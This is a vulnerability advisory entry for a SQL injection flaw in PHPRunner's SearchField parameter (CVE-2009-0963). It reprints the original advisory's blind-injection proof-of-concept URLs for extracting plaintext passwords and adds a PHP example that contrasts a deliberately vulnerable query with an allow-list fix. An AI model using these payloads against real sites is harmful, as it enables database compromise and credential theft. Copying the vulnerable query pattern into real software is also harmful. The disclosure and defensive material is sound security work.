Xlinesoft PHPRunner Multiple Scripts SearchField Parameter SQL Injection Vulnerability

Vulnerability ID 1117484 Vulnerability type SQL injection
Published 2009-03-17 Updated 2009-04-01
CVE number CVE-2009-0963 CNNVD-ID CNNVD-200903-320
Platform PHP CVSS score 7.5
|Vulnerability Source
https://www.exploit-db.com/exploits/8226
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-320
|Vulnerability Details
PHPRunner is a PHP web page generation tool that produces PHP pages for reading and writing MySQL databases. PHPRunner's (1) UserView_list.php, (2) orders_list.php, (3) users_list.php, and (4) Administrator_list.php do not properly validate the input passed in the SearchField parameter before using it in SQL queries; a remote attacker can submit a malicious query request to perform SQL injection and fully compromise the database system.
|Vulnerability EXP
##########################www.BugReport.ir########################################
#
#        AmnPardaz Security Research Team
#
# Title:        PHPRunner SQL Injection
# Vendor:        http://www.xlinesoft.com
# Vulnerable Version:    4.2 (prior versions also may be affected)
# Exploitation:        Remote with browser
# Original Advisory:    http://www.bugreport.ir/index_63.htm
# Fix:            N/A
###################################################################################

####################
- Description:
####################

PHPRunner builds a visually appealing web interface for popular databases. Your web site visitors will be able to easily search, add, edit, delete and export data in MySQL, Oracle, SQL Server, MS Access, and Postgre databases.

####################
- Vulnerability:
####################

Input passed to the "SearchField" parameters in "UserView_list.php" is not properly sanitised before being used in SQL queries.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Vulnerable Pages: 'orders_list.php' , 'users_list.php' , 'Administrator_list.php'


####################
- PoC:
####################

It's possible to obtain plain text passwords from the database by a blind fishing exploit

http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=Password like '%%')--
http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=mid(Password,1,1)='a')--
http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=mid(Password,1,2)='ab')--

####################
- Solution:
####################

Edit the source code to ensure that inputs are properly sanitized.


####################
- Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com 

# milw0rm.com [2009-03-17]
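The allow-list fix that the advisory's Solution section calls for, as an added example that is neither PHPRunner's code nor the advisory author's. The table, column names and sample rows are assumptions, and the code runs against an in-memory SQLite database purely so it is self-contained (the advisory concerns a MySQL backend).

```php
<?php
// Added example (not PHPRunner's own code): how a client-supplied search
// column name has to be handled. An identifier cannot be bound as a prepared
// statement parameter, so the fix is an allow-list of permitted field names
// plus a bound parameter for the search value. Runs offline against an
// in-memory SQLite database with constructed sample rows.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER, username TEXT, password TEXT)');
$db->exec("INSERT INTO users VALUES (1, 'alice', 'secret1'), (2, 'bob', 'hunter2')");

// Vulnerable pattern, as the advisory describes it: SearchField is spliced
// into the SQL text, so a field value that closes the parenthesis and starts
// a comment rewrites the WHERE clause (the search value is unsafe here too).
function search_vulnerable(PDO $db, string $field, string $value): array {
    $sql = "SELECT id, username FROM users WHERE ($field LIKE '%$value%')";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened pattern: the field must be one of a fixed set of searchable
// columns (a hypothetical list for this example), and the value is bound.
const SEARCHABLE_FIELDS = ['id', 'username'];

function search_hardened(PDO $db, string $field, string $value): array {
    if (!in_array($field, SEARCHABLE_FIELDS, true)) {
        throw new InvalidArgumentException("Unknown search field: $field");
    }
    // $field is now one of the literal identifiers above, never client text.
    $stmt = $db->prepare("SELECT id, username FROM users WHERE ($field LIKE :pat)");
    $stmt->execute([':pat' => '%' . $value . '%']);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Same request shape as the advisory's PoC, sent to both implementations.
$field = "password like '%%')--";
$rows = search_vulnerable($db, $field, 'abc');
echo "vulnerable: " . count($rows) . " rows although no row matches 'abc'\n";

try {
    search_hardened($db, $field, 'abc');
} catch (InvalidArgumentException $e) {
    echo "hardened: rejected (" . $e->getMessage() . ")\n";
}
$rows = search_hardened($db, 'username', 'ali');
echo "hardened: " . count($rows) . " row(s) where username contains 'ali'\n";
```

The same allow-list check is the detection point for a WAF or application log rule: any SearchField value outside the fixed column set is a request that cannot have come from the generated UI.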
|References

Source: XF
Name: phprunner-searchfield-sql-injection(49278)
Link: http://xforce.iss.net/xforce/xfdb/49278
Source: VUPEN
Name: ADV-2009-0750
Link: http://www.vupen.com/english/advisories/2009/0750
Source: BID
Name: 34146
Link: http://www.securityfocus.com/bid/34146
Source: BUGTRAQ
Name: 20090317PHPRunnerSQLInjection
Link: http://www.securityfocus.com/archive/1/archive/1/501894/100/0/threaded
Source: MILW0RM
Name: 8226
Link: http://www.milw0rm.com/exploits/8226
Source: MISC
Link: http://www.bugreport.ir/index_63.htm
Source: SECUNIA
Name: 34330
Link: http://secunia.com/advisories/34330
Source: OSVDB
Name: 52801
Link: http://osvdb.org/52801
Source: OSVDB
Name: 52800
Link: http://osvdb.org/52800
Source: OSVDB
Name: 52799
Link: http://osvdb.org/52799
Source: OSVDB
Name: 52798
Link: http://osvdb.org/52798